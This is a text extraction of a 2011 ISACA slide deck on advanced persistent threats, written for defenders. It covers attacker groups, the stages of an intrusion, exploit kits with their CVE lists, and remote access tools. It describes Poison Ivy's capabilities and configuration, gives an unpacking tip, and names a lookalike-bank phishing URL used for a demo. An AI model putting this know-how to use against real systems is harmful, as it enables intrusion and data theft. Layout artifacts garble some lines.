APT Hartford Oct12

Transcription

APT Hartford Oct12

10/10/2011
Advanced Persistent Threat: The
Battle to p0wn Your Network
ISACA Greater Hartford Chapter
October 12
12, 2011
Page 1 | YYYY MM DD | CONFIDENTIAL
Agenda
•
•
•
•
•
•
•
•
•
What is advanced persistent threat?
Goals of the attacker
Stages of APT
Why is it hard to catch them?
Some examples – deconstructing the hack
Lunch/Break
Demonstrations
What to look for?
How can we protect ourselves?
1
10/10/2011
Assumptions
• Any hack can be used to commit an APTstyle
y attack – as long
g as it is stealthy
y enough
g
• As we only have the one day:
–
–
–
–
Malware
Web exploits - SQL injection
Exploiting vulnerabilities in un-patched systems
Browser-based exploits
Who am I?
• Team Lead (Vulnerability Management & Incident
Response) with Bell Aliant:
–
–
–
–
–
P
Penetration
t ti testing
t ti & application
li ti security
it assessments
t
Vulnerability research
Malware analysis
Security Event Monitoring / Incident response
Computer forensic investigations
• Worked as a Senior Manager for E&Y and KPMG in
Security and Forensics
• Worked for the Canadian and US DoD as well as
numerous utilities and .com companies
• Speak at numerous conferences – BlackHat, DefCon,
ISACA, HTCIA, Interop, SANS, etc)
2
10/10/2011
Show of Hands…
• What is your role?
• What do you want to
get out of this session?
• Do you believe your
organization could be
a target of APT?
• On a scale of 1-10
1-10,
how well do you think
your A/V solution is
protecting you?
Getting Scary…
3
10/10/2011
APT IN DEPTH
GENERAL TRENDS
“F
“From
Espionage
E i
to Sabotage”
S b
”
(Enrique Salem – President/CEO, Symantec)
4
10/10/2011
General Trends
•
•
•
•
•
APT is becoming more public
We continue to face challenges going forward
We have to re-thing our security models
Unique malware continues to grow
Government & law enforcement are “out
gunned”
General Trends
• Motivations have changed
• The rise of “hacktivism”
– Hacking to make a political point
– Not just web site tampering
– Manipulating the computer and financial infrastructure of a
target for political reasons is also a form of hacktivism
• The scary thing is that hackers are waging attacks for
a very specific reason!
• Gone are the days of attacks based solely on the
“coolness” factor or the trophy.
• There is lots of money to be had in hacking today!
5
10/10/2011
According to….45 breach cases…
• The cost of a data breach as the result of malicious
attacks and botnets were more costly and severe.
• Organizations are spending more on legal defense
costs which can be attributed to increasing fears of
successful class actions resulting from customer,
consumer or employee data loss.
• Average abnormal churn rates across all incidents in
the study were slightly higher than last year (from 3.6
percent in 2008 to 3.7 percent in 2009), which was
measured by the loss of customers who were directly
affected by the data breach event
2010 Ponemon Institute Survey / PGP Corporation
According to….45 breach cases…
• The most expensive data breach event included in
this year's study cost a company nearly $31 million to
resolve.
• The least expensive total cost of data breach for a
company included in the study was $750,000.
2010 Ponemon Institute Survey / PGP Corporation
6
10/10/2011
According to….531 respondents…
• Malware infection continued to be the most
commonly seen attack, with 67.1 percent of
respondents reporting it.
• Of the approximately half of respondents who
experienced at least one security incident last
year, fully 45.6 percent of them reported
they’d been the subject of at least one
targeted
ta
geted attac
attack.
• Fewer respondents than ever are willing to
share specific information about dollar losses
they incurred
2010-11 CSI Survey
According to….531 respondents…
1. Basic attacks
–
–
–
Phishing
Simple port scans
Brute force password
scans
2. Malware
–
–
Toolkits
Attacks to un-patched
systems
3 Attacks 2.0
3.
20
–
–
APT
21.6% of the 2.0
attacks were
considered “targeted”
2010-11 CSI Survey
7
10/10/2011
What are organizations doing?
According to…Verizon…
• 92% of breached came from external sources
• Only 17% were internal
• 50% were due to a hack – and 49% incorporated malware
Compromised
records by industry
group
Breaches by
Industry
G
Group
2011 Verizon Breach Report
8
10/10/2011
APT IN DEPTH
THE FACE OF CYBERCRIME
The Face of Cybercrime
9
10/10/2011
Max Butler (aka Max Vision)
• 2nd offence after serving
5 yrs for CC theft
• Created Carders
Market, an
underground for
brokering the sale of
CCs and personal
information
• Sentenced to 13 yrs
and ordered to pay
27.5M in restitution
Albert Gonzalez
• Aka “soupnazi”, “segvec”
• Responsible
p
for the TJX
and Heartland CC thefts
• 170M CC numbers
• Previously was an IT
contractor for the US
Secret Service
ironically
o ca y tthe
e sa
same
e
people who arrested him
• Longest US sentence –
20 yrs in Federal prison
10
10/10/2011
Anonymous
• Inspired by the perceived anonymity under
which users p
post images
g and comments on
the Internet
• Been around since 2006, but most well
known recently (2010-11) for:
– HB Gary Hack
– Operation Orlando (Universal Orlando Resort website
defacement, airport + mayor website defacement)
– BofA document release (showing corruption)
– Operation Sony (PlayStation Network hack)
– Operation BART (Bay Area Rapid Transit hack)
Anonymous – Very Brazen….
• “Hacker Group Anonymous Aims To Destroy
Facebook on Nov. 5. 2011”
– Due to their relationship with law enforcement
11
10/10/2011
Anonymous… Operation Facebook
Lulzsec “LOLs-Sec”
• 6 core members (Sabu, Topiary, Kayla, T-Flow, Avunit,
Pwnsauce)
• Does not appear to hack for financial profit
• Motivation is to have fun by causing mayhem
– “We do things just because we find it entertaining" and that
watching the results can be priceless”.
•
As well as for “hactivism” reasons
– When they hacked PBS, they stated they did so in retaliation for
what they perceived as unfair treatment of Wikileaks in a
Frontline documentary entitled WikiSecrets.
• They also claim to be drawing attention to computer
security flaws and holes
– And they are doing a great job finding them – although they are
normally pretty simple flaws (i.e. SQL injection)
• Called it “quits” after 50 days on June 25, 2011
12
10/10/2011
Lulzsec – They mean what they say!
Scary….tried Bill O’Reilly’s site last
week – still vulnerable!
Lulzsec…still around?
13
10/10/2011
Lulzsec
•
•
•
•
•
•
•
•
FOX X-Factor
UK ATM
Sony Japan
PBS
Infraguard
Porn sites
Senate.gov
Gaming sites
Antisec Movement
•
•
Made up of members from Anonymous and LulzSec as well as others
Mission to expose the governments and their contractors through the
"#AntiSec"
#AntiSec movement
–
•
•
Against security companies that use full-disclosure to profit and develop scare-tactics to convince people into
buying their firewalls, anti-virus software and auditing services.
Released 400MB of data from US government security contractor ManTech
Much of the information appears to be related to projects that ManTech is
involved in related to NATO and other security projects.
14
10/10/2011
Organized Crime / Financial-led Campaigns
• Still very common source of APT-type hacks
• The Russian Mafia made more money in online
banking fraud last year than the drug cartels
made selling cocaine
• An entire industry has cropped up over the years
to support the theft of digital information with
players in all aspects of the marketplace.
• Hackers who stole bank account details for
200 000 Citigroup customers infiltrated the
200,000
company's system by exploiting a garden-variety
security hole in the company's website for credit
card users.
State Sponsored
•
DigiNotar (2011)
– Apparently conducted by Iran
– Theory was the attack was "used to spy on Iranian
Internet users on a large scale
scale."
•
Stuxnet (2010)
•
Google / Operation Aurora (2010)
– US/Israel responsible for attack on Iran?
– Attempted theft of Gmail accounts by the Chinese
(including those of senior US government officials,
Chinese activists and others from S. Korea)
– Attacks from Jinan - home to one of six technical
reconnaissance bureaus belonging to the People's
Liberation Army and a technical college U.S.
investigators last year linked to a previous attack on
Google
Google.
•
International Monetary Fund (IMF) Hack (2011)
– Hacker installed software on a single computer that
sent scam e-mails to specific victims
– The sophisticated nature of the attack and the
resources required to execute it indicate a nation-state
was involved
15
10/10/2011
State Sponsored
• China’s Underground (NY Times – Majia Interview)
• “There are the intelligence-oriented hackers inside the
P
People’s
l ’ Lib
Liberation
ti A
Army, as wellll as more shadowy
h d
groups
that are believed to work with the state government.”
• “Computer hacking has become something of a national
sport…There are hacker conferences, hacker training
academies and magazines .”
State Sponsored
• “Microsoft and Adobe have a lot of zero days,” he said,
while scanning Web sites at home. “But we don’t publish
them We want to save them so that some day we can use
them.
them.”
• When asked whether hackers work for the government, or
the military, he says “yes.”
16
10/10/2011
APT IN DEPTH
CYBERCRIME IS EVOLVING
Cybercrime is Evolving
• Vulnerability discoverers most important & SW/HW
vendors introducing vulnerabilities
no vulnerabilities, no
hack,, no breach.
• Eliminates 99% of the rest of the cybercrime world
Stuart McClure - McAfee
17
10/10/2011
Cybercrime is Evolving
Stuart McClure - McAfee
Target Has Evolved
Different issues
then!
18
10/10/2011
Vehicles have changed
etc…
Rising Tide of Cyber Espionage
19
10/10/2011
Wide Range of Victims
Browser Continues to be the Target
20
10/10/2011
High Profile Attacks Increasingly Common
The Evolving Threat Landscape
• # of threats are up 5X
• Nature of threats
changing
– From broad, scattershot
to focused, targeted
Pace of advanced
attacks accelerating
• High profile attacks
common place
– Citicorp, Sony, Epsilon,
RSA, Adobe, Morgan
Stanley, Lockheed, L-3,
PBS, Google…
21
10/10/2011
Hacktivism
• Wikipedia - “The nonviolent use of illegal or
legally
g y ambiguous
g
digital
g
tools in p
pursuit of
political ends.”
• What should or should not be in the world…
• Many techniques used by hacktivists:
–
–
–
–
–
Defacements
Redirects
DoS
Data theft
Web site parodies
Items that Have Caused our Demise…
•
•
•
•
•
•
To much reliance on Antivirus
Social Networking + third party apps
“Trusting” all our outbound traffic
Sloppy perimeter security
Specialized malware
URL-shortening services = Phisher’s best
f
friend
• BitTorrent
• Improved stealth Botnets
22
10/10/2011
We’re Doomed…
2010-11 CSI Survey
The Malware Problem…
• Malware is difficult to deal with
• Exponential growth
• Lots are packed and encrypted – hard to
automated or blacklist
• Any therefore the medium of choice for
attackers!
23
10/10/2011
Malware Samples by Month
Steady increase month-to-month since start of 2010…
McAfee 2011 Q2 Threat Report
2011 Q2 – Total Malware Samples
Steady climb….22% increase over 2010
On track to 75M samples by EOY!
24
10/10/2011
2011 Q2 – Unique Fake-Alert Samples
Steady growth again – malware of choice
2011 Q2 – Fake-AV Samples for Apple
Development of this malware due to the increase of
Apple for business use.
iPad or iPhone malware is a case of “when” not “if”!
25
10/10/2011
2011 Q2 – Evil URLs – Delivering
Malware - Source
2011 Q2 – Evil URLs – Delivering
Malware
26
10/10/2011
How malware is bypassing security technology
•
•
•
•
•
•
•
•
Target browser & plug-in vulnerabilities
Zero-day
Zero
day exploits
Obfuscated javascript
Polymorphic payloads
Frequently changing, dynamic domain names
Encrypted communications
Compromise legitimate Web sites
Social Engineering
APT IN DEPTH
WHAT IS AN APT?
27
10/10/2011
Introduction
• APT is really a “flashy term” vendors and the
like are using
g to categorize
g
attacks that I refer
to as a “targeted attack”.
• Term coined by the USAF in 2006
• That is to say, as opposed to attacks that are
considered “crimes of opportunity”, these
attackss are
attac
a e very
e y well
e thought
t oug t out, based o
on a
specific goal.
Introduction
• The use of the acronym APT:
– Advanced – The attacker is much more skilled, experienced
, highly organized and usually funded when conducting an
APT campaign.
– Persistent – These are not crimes of opportunity. Focus is
on gaining long term control of an organizations network &
data. Attackers maintain the level of interaction needed to
execute their objectives (i.e. backdoors).
– Threat - The attacker is conducting this campaign based on
a very specific
ifi goall – this
thi is
i nott like
lik malware
l
th
thatt h
has no reall
purpose (but to be annoying), they are after something
specific (i.e. IP, access to your network, etc.)
28
10/10/2011
Motive of the Attacker
• Political and/or military objective – Suppress
government ((i.e. “Hacktivism”))
g
• Economic objective – Stealing something of
value – intellectual property
• Technical (i.e. contractors) objective – They
need to hack you as part of a larger goal (i.e.
RSA
S attack
attac to get Secu
SecurID information,
o at o , source
sou ce
code, etc.)
• Critical infrastructure such as power grid,
water supply, telecom
SCADA (i.e. Stuxnet)
What is an APT?
• Many make the mistake of thinking attacks
are transient – that they
y come and g
go
• Attackers want to take advantage of
economy of scale and break into as many
places as possible, as quickly as possible.
• Therefore the tool of choice of an attacker is
automation.
auto
at o
• Automation is not only what causes the
persistent nature of the threat, but it is also
what allows attackers to break in very quickly
29
10/10/2011
What is an APT?
• Old school attacks were about giving the
victim some visible indication of a
compromise.
• Today it is all about not getting caught.
• Stealth and being covert are the main goals
of today’s attacks.
• The goal of these attacks are to look as close
— if not identical — to legitimate traffic. The
difference is so minor that many security
devices cannot differentiate between them
What is an APT?
• Attack’s goal is to provide some significant
benefit to the attacker ((i.e. economic,,
political, financial gain).
• Focus will be all about the data.
• Anything that has value to an organization
means it will have value to an attacker.
• and with the increasing popularity oData has
become portable f cloud computing it is now
available through the Internet.
30
10/10/2011
What is an APT?
• Attackers do not just want to get in and leave,
they
y want long
g term access.
• If someone is going to spend effort breaking
in to an organization, they will make sure they
can keep that access for a long period of
time.
• Stea
Stealing
g data once
o ce has
as value,
a ue, but stealing
stea g
data for nine months gives the attacker even
more payoff.
What is an APT?
• Advanced nations are under constant cyber
attack. This is not a future threat,, this is now.
This has been going on for YEARS.
• Cyber “Cartels” are rapidly growing to
surpass Drug Cartels in their impact on
Global Security
– The scope of finance will surpass drug cartels
– The extent of the operation internationally
31
10/10/2011
What is an APT?
What is an APT?
• MI5 says the Chinese government “represents
one of the most significant
g
espionage
p
g threats”
32
10/10/2011
APT IN DEPTH
WHY IS IT SO HARD TO
CATCH THEM?
• Hard to catch a moving target – we see
attempts
p from different IPs and they
y change
g
very frequently
• Inability to Detect “Low and Slow” Attacks –
Non-predictable traffic patterns
• Hard to detect “bad” traffic when it is in plain
sight
s
g t – HTTP,, HTTPS
S
33
10/10/2011
• Organizations have such a large footprint
infrastructure wise that they
y cannot secure
and keep secure every last area
• Weak web application security
• Lack of monitoring controls – people don’t
know data is missing (until it is up on
pasteb )
“pastebin”)
• Blocking against zero day
• Lack of education in organizations – Spear
phishing
Zero-day threats
• 4 times more zero day threats than in 2010
• Vulnerabilities in systems and applications
that the vendor is unaware about
• They do exist, and someone out there knows
about them
• Used in APTs to breach organizations’
networks are otherwise very secure
34
10/10/2011
APT IN DEPTH
ANATOMY OF AN APT
Step 1 - Reconnaissance
• Attackers will watch and take notes on who in
an organization
g
they
y need to target,
g , from
administrative assistants to executives.
• Much of this information is gleaned from
public Web sites, DNS recon, etc.
• Map org chart (Identify attack targets)
• Social reconnaissance (acquire email
email, IM
IM,
etc.)
• Recruit, blackmail insiders
35
10/10/2011
Step 2 – Initial Breach
• They will use spear-phishing attacks to send
those identified targets an attachment with an
exploit
l it that
th t can be
b used
d tto hij
hijack
k th
the ttarget's
t'
system (malicious PDF, DOC, etc. w/shellcode)
• Any personal information the attacker knows
about the source will be used to entice the target
user to open the attachment.
• Candy drops around the building (Thumb drives,
DVD’ )
DVD’s)
• Gain physical access (impersonate cleaning
crew, etc.)
Step 3 – Establish Covert Backdoor
• Gain elevated user privileges
• Laterally move within network & establish
backdoors
• Inject additional Malware
• Install rootkits, RATs, etc.
36
10/10/2011
Step 4 – Establish C&C Infrastructure
• Grab credential and use these to log-on to
end p
point systems,
y
, and siphon
p
data.
• Now the network is being peppered with
backdoors, tools to grab passwords, steal
emails, and footprint the network
• Establish encrypted SSL tunnel – Covert
channel
c
a e
Step 5 – Complete Objectives/Exfiltrate
• Ex-filtrate Intellectual Property, Trade Secrets
data,
• Imagine anything from financial data
marketing plans, research and development
information - and transferring that information
to an external server under the attackers
control
• Install
sta Trojans
oja s in source
sou ce code
• Control critical systems
37
10/10/2011
Step 6 – Maintain Persistence
• Revamp Malware to avoid detection
• Utilize other attack methods to maintain
presence
• Continue monitoring networks, users, data
Step 7 – Public Distribution (optional)
38
10/10/2011
Anatomy of an APT
MALWARE, BOTNETS AND
RATS…OH MY!
Malware Goal
• All Malware basically does the same stuff
–
–
–
–
–
Compromise a machine undetected
Gain complete control
Identify & acquire “target” information
Attempt ex-filtration of information
Remain undetected - until target info is
acquired + as long as possible
39
10/10/2011
Infection Lifecycle of a Typical Botnet
Malware Facts….
•
APT Malware:
•
Most Common APT Filenames:
– Average File Size: 121.85 KB
–
–
–
–
•
svchost.exe (most common)
iexplore.exe
iprinp.dll
wiinzf32.dll
APT Malware avoids anomaly detection through:
– Outbound HTTP connections
– Process injection
– Service persistence
•
APT Malware Communication:
– 100% of APT backdoors made only outbound connections
– 83% used TCP port 80 or 443
– 17% used another port
40
10/10/2011
Malware Evasion Tactics
• Common techniques:
–
–
–
–
–
–
–
–
–
Compression
p
Obfuscation
Polymorphism
Internal encryption
Stealth tactics
Dynamic memory residence
Armoring
Anti-code debuggers
Kernel alterations
Defining Advanced Malware
• We can see the evolution
• Next generation of threats
–
–
–
–
–
U k
Unknown
Targeted
Polymorphic
Dynamic
Personalized
• Leverage zero-day
vulnerabilities, commercial
quality
lit toolkits,
t lkit social
i l
engineering tactics
• Often targets IP, credentials
or other networked assets
41
10/10/2011
Conventional vs. Modern, APT Malware
• Conventional Malware
– Characterized by
y using
g “spreading”
p
g techniques,
q
, custom
– C&C transport protocols, IRC communication
– Examples: Malware/worms such as Conficker, Blaster,
Slammer, Mega-D, IRC bots
– Detectable through a variety of technologies/tactics:
NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS
– Port scanning,
g, high
g windows p
port activity,
y, non-http
p over
port 80, non-web traffic, etc.
Conventional vs. Modern, APT Malware
• Modern-ish malware
– Characterized by
y infecting
g via browser based exploits
p
– Exploit Channel: PDF, Flash, IE/FireFox, QuickTime,
C&C
– Callback over HTTP(s)
– Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye
– Partially detectable through manual traffic analysis
fairly
y easily,
y, but a full time resource is needed
42
10/10/2011
Collapse of Current Technologies
•
AV (Symantec, McAfee, Trend)
bypassed by
–
–
–
•
URL Filtering (Cisco, Blue Coat,
WebSense) bypassed by
–
–
–
•
Dynamic zero-day malware
Targeted attacks
Polymorphic malware
Dynamic domain names & URLs
Compromised legitimate Web Sites
Spear Phishing with embedded
URL’s
IPS (Cisco, McAfee, TippingPoint,
SourceFire) bypassed
–
–
–
Signatures for reactive threats
Heuristics are too noisy - high
FP/FN rate
Can’t stop Targeted Malware
What About AV?
“Even after 30 days, many AV vendors cannot detect
known attacks, making it critical for
enterprises to take a more proactive approach to
online security in order to minimize the
potential for infection,” - Panos Anastassiadis (COO, Cyveillance)
43
10/10/2011
Malware Can Defeat Sophisticated
Defenses - Encryption
• Just because your laptops and critical data
may be
b encrypted
t dd
doesn’t
’t mean your
enterprise more secure than before
– If you can access your laptop’s encrypted data, then
that means…
– …so too can a Trojan Horse which borrows your
Windows logon credentials
• Trojans enable knowledgeable hackers to
bypass both strong encryption and
sophisticated defenses alike in order to steal
sensitive data.
New Direction for Malware
• Malicious code used in APT attacks are usually:
– Not “sexy” –the simple techniques work well!
– To some extent, custom
• Not widely disseminated = not picked up by AV
• Not necessarily custom code but custom “packaging”
– Highly targeted
• Mostly a factor of the delivery mechanism, spearphishing email, web link, etc.
– Modular
• Monolithic binary is risky; reveals too much about the
MO, capabilities of the attacker
44
10/10/2011
Modular….what’s That?
• Historically your neighborhood script kiddie had one
of two choices for his exploitation tools:
– The Unix way: a lot of tools, each one does a certain
function very, very well
– The Microsoft Word way: one tool to rule them all, contains
all the functionality plus the kitchen sink
• However both of these techniques have drawbacks
– The Unix way inevitably leads to tools that have vastly
different interfaces,
interfaces difficult learning curve
– The Word way helps ensure a consistent interface but
exposes all of your capabilities at once to the malware
analyst
Modular Implants vs. Memory Analysis
• These modular implants pose a significant challenge
to the incident responder
– No longer is the entire binary (or binaries) available for
viewing and analysis from the disk
– Now we must fuse together the results of traditional malware
analysis with the volatile data acquisition
• Malware authors will continue to improve in this
arena
– Freeing unused memory as soon as it is no longer
necessary
– Zeroing out sensitive memory areas after use
• Will need more research and development to keep
pace with the malicious code authors!
45
10/10/2011
APT IN DEPTH
FORMS OF MALWARE
Rogueware
• Rogue security software (i.e. FakeAV)
• 35M computers infected every month with a
form of rogueware
• Many victims pay for these programs, $50$70, and stats show how bad guys are
making upwards of $34M a month with this
scam
sca
• Many are fake anti-virus scanners
46
10/10/2011
Rogueware
Rogueware
47
10/10/2011
Twitter / Facebook
• Koobface – Links to
malicious websites
in Twitter & FB
• Linked to sites that
would install
malware
e - Message
essage to
• I.e.
view a video – Flash
Player update
needed = Malware
The Risks: Koobface in Action
48
10/10/2011
Less than 10 minutes later!
49
10/10/2011
50
10/10/2011
Movie Anyone?
• Torrent download
• Need a codec
• Download the
codec, and your
machine is infected
• Your .rar archive is
password protected,
protected
go to this link for the
password.
51
10/10/2011
Adobe Zero Day
• Exploits in Flash, Acrobat = Cross platform
• Open
p a PDF that has bad shellcode in it with
a vulnerable version of Reader
• Forced to release out-of-band patches
• 2010 McAfee Labs counted 214,992 pieces
of malware aimed at vulnerabilities in Adobe
Acrobat and Reader.
• In contrast
contrast, only 2,227
2 227 malware attacked
vulnerabilities in Microsoft Office products.
• Still lots of organizations with old versions out
there
Adobe Zero Day
• Example - TROJ_PIDIEF.WX
(
(CVE-2009-0927)
)
– The PDF document contains
heavily encrypted java script
which has a malicious shellcode.
– Downloads a malicious file from
the site
http://xxxx com/geed/geed exe
http://xxxx.com/geed/geed.exe
52
10/10/2011
Adobe Zero Day
• “I have deployed a newer version…no
p
problem!”
– End user grabs a copy of Adobe Acrobat (only licensed
version I have is v7.0 or user installs scanner software
package…
– End user installs this – old version of reader installed
along with writer
AutoRun (USB)
• Made popular by Conficker
autorun inf to change
• Use of autorun.inf,
the options
• Attackers manipulate the
options in the popup
• Better with Windows 7
53
10/10/2011
Password Stealing Trojans (i.e. Zeus)
• Targeted mostly financial
organizations
• Big hit on BofA in 2010
• Keystroke monitoring trojan
Remote Access Tools (RATs)
• Poison Ivy, Nuclear RAT, etc.
y
• Provide Remote access to systems
• Remote registry, screen grab, keystroke log,
CMD shell, shutdown, file viewer, etc.
54
10/10/2011
DNS Hijack Malware
• Resets you DNS server settings
attacker’s
s DNS
• Points you to an attacker
• Resolves common sites (i.e. Google.com) to
attackers address
• Download malware from there
• Lots of organizations do not block outbound
DNS resolution
• Becoming popular with Apple products
APT In Depth
MALWARE DISTRIBUTION
55
10/10/2011
Booby trapped Documents
2010 Greg Hoglund
Drive-by-Malware (Web based Attack)
2010 Greg Hoglund
56
10/10/2011
Trap Postings
2010 Greg Hoglund
Trap Postings
2010 Greg Hoglund
57
10/10/2011
SQL Injection
2010 Greg Hoglund
Reflected Injection (XSS)
2010 Greg Hoglund
58
10/10/2011
Three Step Infection
2010 Greg Hoglund
Payload Server
• A machine that has the actual malware
dropper
pp ready
y for download
• The exploit server will redirect the victim to
download a binary from this location
2010 Greg Hoglund
59
10/10/2011
APT in Depth
MALWARE TOOLKITS
Malware Toolkits
• Those that don’t want to
sell malware sell the
means to help build
malware:
•
•
•
•
•
•
•
•
•
•
•
ZoPack
El-Fiesta
IcePack
Neosploit
AdPack
Zeus
SpyEye
Tornado
Eleonore
Dragon Pack
Bleeding Life
60
10/10/2011
Malware Toolkit Exampe - IcePack
• Old-ish, but a
classic example
• According to the
toolkit creator, the
exploitation rate of
this toolkit in 2009
was 50% for
R ssian visitors
Russian
isitors and
20% for all of the
visitors. He asks for
$400 for the toolkit.
Malware Toolkit Example - IcePack
• Builds malware to take advantage of:
– MDAC - CVE-2006-0003
– Windows Media Player plug-in for Firefox and Opera CVE-2006-0005
– WebViewFolderIcon ActiveX - CVE-2006-3730
– VML - CVE-2006-4868
– Winzip FileView ActiveX - CVE-2006-6884
– QuickTime RSTP - CVE
CVE-2007-0015
2007 0015
61
10/10/2011
Malware Toolkits - Zeus
Nice user-friendly interface☺
Malware Toolkits – Zeus Trojan
• 55% of Zeus-infected systems had up-to-date
AV
• User-friendly
U
f i dl
• Attacker can search collected data for
cookies, files, contents of HTTP requests,
FTP logons, etc.
• The files collected by Zeus were typically
stored on compromised servers
• Sold
S
for
f as low as $250
$2 0 ((with support!))
• One variant had C&C running on Amazon’s
EC2 cloud
62
10/10/2011
Malware Toolkit Example - Spy Eye
• Very similar to Zeus,
but not as advanced
• Botnet toolkit
• $500 USD
• Invisible as a service,
in the registry and files
• Captures data from IE
and Firefox
Malware Toolkits
• Sites dedicated to
exchanging malware
• Tips/tricks on
developing malware.
• Many of these sites
maintained by the
Russians
63
10/10/2011
Zeus source code for the latest
version 2.0.8.9 for $100k in 2010!
Eleonore (exploit pack)
•
PDF pack
–
–
–
–
•
MS Internet Explorer Exploits
–
–
•
MS09-002 (Internet Explorer 7 exploit
1/2009)
MDAC – ActiveX (Internet Explorer
exploit, 3/2007)
Java
–
•
PDF Brand new PDF Exploit (12/2009)
PDF collab.getIcon (4/2009)
PDF Util.Printf (11/2008)
PDF collab.collectEmailInfo (2/2008)
Javad0 (12/2008) – Java Calendar
(Java Runtime Environment (JRE) for
Sun JDK and JRE 6 Update 10 and
earlier; JDK and JRE 5.0 Update 16
and earlier; and SDK and JRE
1 4 2 18 and earlier)
1.4.2_18
Firefox
–
–
compareTo – exploit for a Firefox
vulnerability from 2005
jno – Exploit for Firefox version 1.5.x
(2006)
64
10/10/2011
Tornado (exploit pack)
Dragon Pack
65
10/10/2011
Bleeding Life
APT in Depth
COMMAND & CONTROL
66
10/10/2011
Command & Control
2010 Greg Hoglund
Command & Control
• Command-and-control systems
–
–
–
–
Custom p
protocols ((like Aurora))
Plain old URL’s
IRC (not as common anymore)
Stealth / embedded in legit traffic
• Machine identification
– Store infections in a back-end SQL database
67
10/10/2011
Command & Control
• IRC C&C
• IRC control channel for a DDoS botnet
• Most of the C&C has moved to the web
Command & Control
68
10/10/2011
Command & Control
Staging Server
• A place to store all the stolen goods before it
gets “exfiltrated”
g
– Data is moved off the network in a variety of ways
2010 Greg Hoglund
69
10/10/2011
Drop Site
• Sometimes the stolen data is moved to a
tertiary
y system,
y
, not the same as the C&C.
2010 Greg Hoglund
APT in Depth
REMOTE ACCESS TOOLS
(RAT)
70
10/10/2011
RATs
• Also known as “Implants”
–
–
–
–
–
The “persistent”
p
backdoor p
program
g
Hide in plain site strategy
General purpose hacking tool
Stealth capabilities
In-field update capabilities
RATs
• According to Wikipedia: A Remote Administration Tool (known
more commonly on the Internet as a RAT) is used to remotely
connect and manage a single or multiple computers with a
variety of tools, such as:
–
–
–
–
–
–
Screen/camera capture or control
File management (download/upload/execute/etc.)
Shell control (usually piped from command prompt)
Computer control (power off/on/log off)
Registry management (query/add/delete/modify)
Other product-specific function
• Watch out for terminology: server is the remote part, client is the
GUI C&C part
71
10/10/2011
RATs
•
Many Chinese hacker websites offer these tools for download, including links to
reduh, WebShell, ASPXSpy, etc, plus exploits and zero-day malware.
RATs
•
•
•
•
Nuclear RAT
Gh0st RAT
Bifrost Remote Controller
Poison Ivy
72
10/10/2011
Poison Ivy
• Polymorphic encryption
y
p
decryption
yp
routine
• Polymorphic
• Add unique tricks to bypass sandbox and
memory scan
Poison Ivy
73
10/10/2011
Poison Ivy
A 7kb file? Probably not much in there… but let’s try
anyway.
Poison Ivy RAT
• Free for download at
www.poisonivy-rat.com
• The license says you
can order special,
undetected version
• It also says that
updating to new version
is very easy because
the remote part does
not need to be updated
74
10/10/2011
Poison Ivy RAT
• In the Poison Ivy
naming
g convention
(other RATs as
well), the client is
the GUI console and
the server is the
remote agent siting
in the infected
f
computer
Poison Ivy - Server
• Generated from within the client with user supplied options (IP
to connect, password etc.)
• Very small: around 6 kb of code (position independent)
independent), all the
rest sent on-demand from the client
• Hides very well in the system: I’ve seen behavioral tools failing
to detect it because they couldn’t reconginze the API calls
• Generate options include:
–
–
–
–
–
Password when authenticating with the client
IP address to connect to
Is starting at boot or no
Where to drop the EXE
Whether to perform the code injection, etc, etc.
75
10/10/2011
Poison Ivy - Server
Poison Ivy – The Client
• Its capabilities include:
–
–
–
–
–
–
–
–
–
–
–
–
–
File manager
File shredder
Registry manipulator
Process viewer and manipulator
Services and driver viewer
TCP/IP relay proxy
Active connection and port lister
Remote cmd.exe shell
P
Password
dd
dumper
Key logger
Screen and audio capture
Internet camera capture
Has plugin architecture that allows writing more
76
10/10/2011
Poison Ivy – Network
• Site says it uses Camelia Encryption
Challenge-response
response authentication: first 256
• Challenge
random bytes is a chalenge, the client sends
the response and the server verifies if the
client knows the password
• The encryption is not well implemented;
reseeding
eseed g tthe
e ccrypto
ypto with
t eac
each ttrasmission
as ss o
Poison Ivy – Network
• The encryption routines can be spotted by
seeing
g a lot of arithmetic operations
p
• By tracing how these function work, we can
locate the password – very important
77
10/10/2011
Poison Ivy – Obfuscating the Code
• Distributed obfuscated by ExeStealth v2.7x, as identified by
DiE.exe (Detect-It-Easy), PEiD failed to detect it
• The code is written in Borland Delphi
• The packer performs antidebugging tricks such as spaghetti
jumps, jumping to the middle of instruction, checking «
BeingDebugged » flags, calculating the CRC over its own code
• There is an easy trick to unpack this: after the first Access
Violation exception, place the breakpoint on the CODE section –
the next break will be OEP
• We
W need
d to
t hide
hid th
the d
debugger;
b
Ph tO for
PhantOm
f Olly
Oll is
i ok!
k!
• The final step is to use Import Reconstructor with the appropiate
plugin to rebuild the exe
Demo of Poison Ivy
• The trick to PI is distribution of the “server”
side of the trojan
j
• bank0famerica.com/login/downloadreport.exe
• Let’s have a look…
78
10/10/2011
Nuclear RAT
• Developed by the “Nuclear Winter Crew”
(217 600 bytes) is
• The server component (217,600
dropped under Windows, System32, or
Program Files folders, under a custom named
folder; the default is NR.
• Once the server component is run, it tries to
connect
co
ect to its
ts cclient,
e t, tthat
at listens
ste s for
o incoming
co
g
connections on a configurable port, to allow
the attacker to execute arbitrary code from his
or her computer.
Nuclear RAT - Capabilities
•
•
•
•
•
•
•
•
•
Take screenshots
View webcam shots
Capturing key strokes from the
keyboard
General information about computer
(Username, Timezone, Version
installed, Language, Available drives,
etc)
Mouse control
Remote BAT/VBS script execution
Monitor resolution
File Manager (Download files and
folders, Delete, Upload, Execute,
Rename, Copy, Set Attributes, Create
Folder, etc)
Window Manager (Hide, show, close,
minimize/maximize, disable/enable X,
rename caption, send keys, etc)
•
•
•
•
•
•
•
•
•
•
•
•
•
Process Manager (kill, unload DLL, list
DLLs)
Registry Manager (Create key, edit
values REG
REG_DWORD,
DWORD REG
REG_BINARY,
BINARY
REG_MULTI_SZ, REG_SZ, create
values, rename values)
Clipboard manager
Plugins manager (to add extra
funcionality to the malware)
Shutdown computer
Message Box
Chat with infected machine
Web downloader
IP Scanner
S
Port redirect
TCP tunnel
HTTP Web server
Shell console
79
10/10/2011
Nuclear RAT
• Is detectable by A/V
• Not a polymorphic as Poison Ivy
• Also known as
–
–
–
–
–
–
–
Backdoor.Delf.jl
Backdoor.Delf.jw
Backdoor.Win32.Nuclear.b
Win-Trojan/NucRAT
Win-Trojan:NucRAT
Win32/Nuclear.AG
Backdoor.Win32.Nuclear.ak
Demo of Nuclear Rat
